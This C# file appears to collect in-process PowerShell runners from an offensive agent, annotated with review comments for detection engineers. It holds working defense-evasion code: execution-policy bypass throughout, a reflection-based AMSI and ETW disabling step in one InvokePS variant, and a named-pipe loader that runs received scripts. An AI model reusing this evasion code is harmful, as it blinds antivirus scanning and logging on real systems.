/// <summary>
/// Executes <paramref name="command"/> as PowerShell script text in a newly created,
/// in-process runspace and returns whatever the custom host's UI captured.
/// </summary>
/// <param name="command">Script text added to the pipeline; it is executed as code.</param>
/// <param name="useLocalScope">Passed straight through to <c>AddScript</c>.</param>
/// <returns>The <c>Output</c> string collected by <c>CustomPSHostUserInterface</c>.</returns>
/// <remarks>
/// The session state is created with its <c>AuthorizationManager</c> cleared, so the
/// execution-policy check is not applied to the script. Because the engine is hosted
/// in-process, anything reviewing this code should treat every caller of this method
/// as a code-execution entry point.
/// </remarks>
public static string InvokeScript(string command, bool useLocalScope)
{
    var psHost = new CustomPSHost();
    var sessionState = InitialSessionState.CreateDefault();

    // No authorization manager => execution policy is not consulted.
    sessionState.AuthorizationManager = null;

    using (var rs = RunspaceFactory.CreateRunspace(psHost, sessionState))
    {
        rs.Open();

        using (var pipe = rs.CreatePipeline())
        {
            var commands = pipe.Commands;

            commands.AddScript(command, useLocalScope);
            // Fold the script's error stream into its output so both reach the host UI.
            commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
            commands.Add("out-default");

            pipe.Invoke();
        }
    }

    // Read the captured text only after the runspace has been torn down.
    var ui = (CustomPSHostUserInterface)psHost.UI;
    return ui.Output;
}
/// <summary>
/// Runs <paramref name="command"/> in a fresh in-process PowerShell runspace configured
/// for a single-threaded apartment and returns the text captured by the custom host.
/// </summary>
/// <param name="command">Script text to execute.</param>
/// <returns>Everything the custom host UI recorded, errors included.</returns>
/// <remarks>
/// A custom PSHost is used because many scripts emit via Write-Host rather than
/// Write-Output; without a host implementation that text would not be captured.
/// The execution-policy check is disabled by clearing <c>AuthorizationManager</c>.
/// </remarks>
public static string InvokePS(string command)
{
    var captureHost = new CustomPSHost();

    InitialSessionState iss = InitialSessionState.CreateDefault();
    // STA: per the original author, chosen to make token impersonation easier.
    iss.ApartmentState = ApartmentState.STA;
    // Clearing the authorization manager disables the execution-policy check.
    iss.AuthorizationManager = null;

    using (Runspace rs = RunspaceFactory.CreateRunspace(captureHost, iss))
    {
        rs.Open();

        using (Pipeline pl = rs.CreatePipeline())
        {
            pl.Commands.AddScript(command);

            // Route the script's errors into the output stream before formatting.
            var scriptCommand = pl.Commands[0];
            scriptCommand.MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);

            pl.Commands.Add("out-default");
            pl.Invoke();
        }
    }

    return ((CustomPSHostUserInterface)captureHost.UI).Output;
}
/// <summary>
/// Executes the given PowerShell script text in a throw-away runspace and hands back
/// the text that the custom host collected.
/// </summary>
/// <param name="command">PowerShell script text; executed as code.</param>
/// <returns>Captured host output (the error stream is merged into it).</returns>
/// <remarks>
/// The custom PSHost exists so that Write-Host output is captured as well as
/// Write-Output. The runspace is built from a default session state whose
/// <c>AuthorizationManager</c> has been set to null, which disables the
/// execution-policy check for this runspace.
/// </remarks>
public static string InvokePS(string command)
{
    var host = new CustomPSHost();
    var ui = (CustomPSHostUserInterface)host.UI;

    InitialSessionState sessionState = InitialSessionState.CreateDefault();
    sessionState.AuthorizationManager = null; // execution policy not enforced

    using (var runspace = RunspaceFactory.CreateRunspace(host, sessionState))
    {
        runspace.Open();

        using (var pipeline = runspace.CreatePipeline())
        {
            var cmds = pipeline.Commands;
            cmds.AddScript(command);
            cmds[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
            cmds.Add("out-default");
            pipeline.Invoke();
        }
    }

    string captured = ui.Output;
    return captured;
}
/// <summary>
/// Builds the harness: creates the custom host, a default session state with the
/// authorization manager removed, and opens a runspace bound to the calling thread.
/// </summary>
/// <remarks>
/// Clearing <c>AuthorizationManager</c> means the execution-policy check is not applied
/// to scripts run in this runspace. <c>UseCurrentThread</c> is set before the runspace
/// is opened, so pipeline work runs on the thread that invokes it.
/// </remarks>
private Harness()
{
    host = new CustomPSHost(this);

    state = InitialSessionState.CreateDefault();
    state.AuthorizationManager = null; // execution policy not enforced

    myRunSpace = RunspaceFactory.CreateRunspace(host, state);
    // Thread options must be configured before Open().
    myRunSpace.ThreadOptions = PSThreadOptions.UseCurrentThread;
    myRunSpace.Open();
}
/// <summary>
/// Creates a runner with its own custom host and an already-opened runspace.
/// </summary>
/// <remarks>
/// The session state is the PowerShell default with <c>AuthorizationManager</c> set to
/// null, so scripts executed through this runner are not subject to the
/// execution-policy check.
/// </remarks>
public Runner()
{
    this._state = InitialSessionState.CreateDefault();
    this._state.AuthorizationManager = null; // execution policy not enforced

    this._host = new CustomPSHost();

    this._runspace = RunspaceFactory.CreateRunspace(this._host, this._state);
    this._runspace.Open();
}
/// <summary>
/// Creates a runner tagged with <paramref name="id"/> and opens a runspace for it.
/// </summary>
/// <param name="id">Identifier stored on the runner; not interpreted here.</param>
/// <remarks>
/// The runspace is created from a default session state whose
/// <c>AuthorizationManager</c> is null, i.e. without the execution-policy check.
/// </remarks>
public Runner(string id)
{
    this._id = id;

    // Default session state, minus the authorization manager.
    this._state = InitialSessionState.CreateDefault();
    this._state.AuthorizationManager = null;

    this._host = new CustomPSHost();
    this._runspace = RunspaceFactory.CreateRunspace(this._host, this._state);
    this._runspace.Open();
}
/// <summary>
/// Sets up the host, an opened runspace and a pipeline that later calls reuse.
/// </summary>
/// <remarks>
/// Two session-state settings weaken the default posture: <c>AuthorizationManager</c>
/// is cleared (no execution-policy check) and <c>LanguageMode</c> is set to
/// <c>FullLanguage</c>.
/// NOTE(review): whether the explicit FullLanguage request overrides a
/// system-enforced constrained mode cannot be told from this constructor; the
/// original author also marked that line with a questioning comment.
/// </remarks>
public PowerShellRunner()
{
    PSHost = new CustomPSHost();

    InitialSessionState sessionState = InitialSessionState.CreateDefault();
    sessionState.LanguageMode = PSLanguageMode.FullLanguage;
    sessionState.AuthorizationManager = null; // execution policy not enforced

    Runspace = RunspaceFactory.CreateRunspace(PSHost, sessionState);
    Runspace.Open();

    // One pipeline is created up front and kept on the instance.
    Pipeline = Runspace.CreatePipeline();
}
/// <summary>
/// Creates a runner tagged with <paramref name="id"/>, opens its runspace and then
/// executes every script returned by <c>Scripts.GetAllScripts()</c> in it.
/// </summary>
/// <param name="id">Identifier stored on the runner.</param>
/// <remarks>
/// The runspace has no authorization manager, so neither the preloaded scripts nor
/// anything executed later is subject to the execution-policy check.
/// NOTE(review): the contents of <c>Scripts.GetAllScripts()</c> are not visible here;
/// whatever it returns runs at construction time.
/// </remarks>
internal Runner(string id)
{
    this._id = id;

    this._state = InitialSessionState.CreateDefault();
    this._state.AuthorizationManager = null; // execution policy not enforced

    this._host = new CustomPSHost();
    this._runspace = RunspaceFactory.CreateRunspace(this._host, this._state);
    this._runspace.Open();

    // Preload the bundled scripts so their definitions are available in the runspace.
    foreach (var bundled in Scripts.GetAllScripts())
    {
        this.Execute(bundled);
    }
}
/// <summary>
/// Runs <paramref name="command"/> in a fresh in-process PowerShell runspace and returns
/// the text captured by the custom host. Before the script is added, this variant
/// overwrites two non-public static fields of the PowerShell engine by reflection.
/// </summary>
/// <param name="command">PowerShell script text; executed as code.</param>
/// <returns>The <c>Output</c> string of <c>CustomPSHostUserInterface</c>.</returns>
/// <remarks>
/// Security-relevant behaviour visible in this method:
/// the execution-policy check is disabled (<c>AuthorizationManager = null</c>);
/// the engine's <c>etwProvider</c> field is replaced; and <c>amsiInitFailed</c> is
/// forced to <c>true</c>. Both fields are static, so the change is shared by every
/// runspace in the AppDomain, not just the one created here. For reviewers and
/// detection engineers this method is a textbook example of in-process telemetry
/// tampering: the engine's own logging cannot be relied on afterwards, so visibility
/// has to come from outside it (for example, the load of System.Management.Automation
/// into an unexpected host process, or a sudden absence of expected script telemetry).
/// </remarks>
public static string InvokePS(string command)
{
    // A custom PSHost is needed so that Write-Host output is captured; scripts that
    // only used Write-Output would not require it, but enough use Write-Host.
    CustomPSHost host = new CustomPSHost();
    var state = InitialSessionState.CreateDefault();
    state.AuthorizationManager = null; // Bypass PowerShell execution policy
    using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
    {
        runspace.Open();
        using (Pipeline pipeline = runspace.CreatePipeline())
        {
            BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;

            // Telemetry tampering (1): the non-public static field "etwProvider" on
            // PSEtwLogProvider is overwritten with an EventProvider registered under a
            // freshly generated GUID.
            // NOTE(review): the apparent effect is that the engine's ETW events are no
            // longer written under its real provider identity - confirm against the
            // targeted engine version.
            var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
            var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
            EtwProvider.SetValue(null, EventProvider);

            // Telemetry tampering (2): the non-public static field "amsiInitFailed" on
            // AmsiUtils is set to true.
            // NOTE(review): presumably this makes the engine treat AMSI as unavailable,
            // so script content is not submitted for scanning - confirm.
            var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);

            // Only after both field writes is the caller's script added and invoked.
            pipeline.Commands.AddScript(command);
            // Merge the script's error stream into its output so both reach the host UI.
            pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
            pipeline.Commands.Add("out-default");
            pipeline.Invoke();
        }
    }
    string output = ((CustomPSHostUserInterface)host.UI).Output;
    return(output);
}
/// <summary>
/// Builds a single PowerShell <c>Command</c> from <paramref name="command"/>, attaches
/// the supplied parameters and runs it in a fresh in-process runspace.
/// </summary>
/// <param name="command">Command name or script text, depending on <paramref name="isScript"/>.</param>
/// <param name="isScript">Passed to the <c>Command</c> constructor.</param>
/// <param name="useLocalScope">Passed to the <c>Command</c> constructor.</param>
/// <param name="parameterNames">Parameter names, in order.</param>
/// <param name="parameterValue">
/// Expected to be an <c>ArrayList</c> of values matched to <paramref name="parameterNames"/>
/// by position. A name with no value at its position is added as a value-less parameter.
/// </param>
/// <returns>The text captured by the custom host UI.</returns>
/// <remarks>
/// The runspace is created without an authorization manager, so the execution-policy
/// check is not applied.
/// NOTE(review): <paramref name="parameterValue"/> is converted with <c>as</c> and not
/// null-checked; if it is not an <c>ArrayList</c> and at least one name is supplied, the
/// loop dereferences null.
/// </remarks>
public static string InvokeCommand(string command, bool isScript, bool useLocalScope, string[] parameterNames, object parameterValue)
{
    var values = parameterValue as ArrayList;

    var psHost = new CustomPSHost();
    var sessionState = InitialSessionState.CreateDefault();
    sessionState.AuthorizationManager = null; // execution policy not enforced

    using (var rs = RunspaceFactory.CreateRunspace(psHost, sessionState))
    {
        rs.Open();

        using (var pipe = rs.CreatePipeline())
        {
            var cmd = new Command(command, isScript, useLocalScope);

            // Pair names with values by position; surplus names become bare parameters.
            int position = 0;
            foreach (string name in parameterNames)
            {
                if (position >= values.Count)
                {
                    cmd.Parameters.Add(name);
                }
                else
                {
                    cmd.Parameters.Add(name, values[position]);
                }

                position++;
            }

            cmd.MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);

            pipe.Commands.Add(cmd);
            pipe.Commands.Add("out-default");
            pipe.Invoke();
        }
    }

    var ui = (CustomPSHostUserInterface)psHost.UI;
    return ui.Output;
}
/// <summary>
/// Starts a named pipe server called <paramref name="pipeName"/>, waits for one client,
/// reads a <c>PowerShellJobMessage</c> from it, executes the job's scripts in an
/// in-process PowerShell runspace and sends the output back over the same pipe.
/// </summary>
/// <param name="pipeName">Name passed to <c>CreateNamedPipeServer</c>.</param>
/// <remarks>
/// Review points visible in this method:
/// the job's <c>LoadedScript</c> and <c>Command</c> are executed as script text exactly as
/// received from the pipe, with the execution-policy check disabled
/// (<c>AuthorizationManager = null</c>), so whoever can connect to the pipe controls
/// what runs.
/// NOTE(review): <c>bf</c> is declared outside this block; its <c>Binder</c>/<c>Serialize</c>
/// members suggest a BinaryFormatter. If so, <c>ReadJob</c> deserializes pipe data and
/// <c>PowerShellJobMessageBinder</c> is the only type restriction - confirm that the
/// binder allow-lists types and that the pipe's ACL (set in
/// <c>CreateNamedPipeServer</c>, not shown) limits who may connect.
/// NOTE(review): the null checks below rely on <c>KillJob</c> not returning; if it does
/// return, the following statements dereference null.
/// </remarks>
public static void InitializeNamedPipeServer(string pipeName)
{
    //var pipeName = "Apollo-PS";
    // Restrict/resolve types during (de)serialization through the job-message binder.
    bf.Binder = new PowerShellJobMessageBinder();
    NamedPipeServerStream pipeServer = null;
    try
    {
        pipeServer = CreateNamedPipeServer(pipeName);
    }
    catch (Exception e)
    {
        // Failure is only reported here; the null check below decides what happens next.
        Console.WriteLine("ERROR: Could not start named pipe server. " + e.Message);
    }
    if (pipeServer == null)
    {
        KillJob(JobExitCode.PipeStartError);
    }
    PowerShellJobMessage newJob = null;
    try
    {
        // Blocking wait is sufficient: only one client (the agent core) is expected, and
        // it keeps the connection open until the job is done.
        pipeServer.WaitForConnection();
        newJob = ReadJob(pipeServer);
    }
    catch (Exception e)
    {
        Console.WriteLine("ERROR: Could not read powershell from named pipe. " + e.Message);
        pipeServer.Close();
        return;
    }
    // NOTE(review): the original comment here spoke of creating a new named pipe named
    // after the task ID to avoid collisions with other jobs; no such pipe is created in
    // this method, so that comment looks stale.
    if (newJob == null)
    {
        KillJob(JobExitCode.AssemblyReadError);
    }
    // The writer wraps the pipe; disposing it at the end of this block closes the pipe.
    using (StreamWriter writer = new StreamWriter(pipeServer))
    {
        writer.AutoFlush = true;
        // Outside POWERPICK builds, stdout/stderr of the whole process are redirected
        // into the pipe for the duration of the job.
#if !POWERPICK
        var origStdout = Console.Out;
        var origStderr = Console.Error;
        Console.SetOut(writer);
        Console.SetError(writer);
#endif
        try
        {
            CustomPSHost host = new CustomPSHost();
            InitialSessionState state = InitialSessionState.CreateDefault();
            // No authorization manager: the execution-policy check is not applied.
            state.AuthorizationManager = null;
            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.Open();
                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    // Both scripts come from the job message read off the pipe.
                    pipeline.Commands.AddScript(newJob.LoadedScript);
                    pipeline.Commands.AddScript(newJob.Command);
                    // Only the first command (LoadedScript) has its error stream merged
                    // into output; the second is left as is.
                    pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
                    pipeline.Commands.Add("Out-Default");
                    pipeline.Invoke();
                }
            }
        }
        catch (Exception e)
        {
            // Reported through Console, which is the pipe when stdout was redirected above.
            Console.WriteLine("ERROR: Unhandled exception in the PowerShellRunner: {0}\n{1}", e.Message, e.StackTrace);
            //Console.WriteLine(e);
        }
        finally
        {
            // POWERPICK builds signal completion with a serialized terminator message;
            // other builds restore the console streams saved before the job ran.
#if POWERPICK
            bf.Serialize(pipeServer, new PowerShellTerminatedMessage() { Message = "Finished execution." });
#else
            // Restore streams (the original author was unsure this is needed).
            Console.SetOut(origStdout);
            Console.SetError(origStderr);
#endif
        }
        // Block until the client has read everything written to the pipe.
        pipeServer.WaitForPipeDrain();
    }
    //Console.WriteLine("Waiting for output to be read completely...");
    //Console.WriteLine("Exiting loader stub...");
}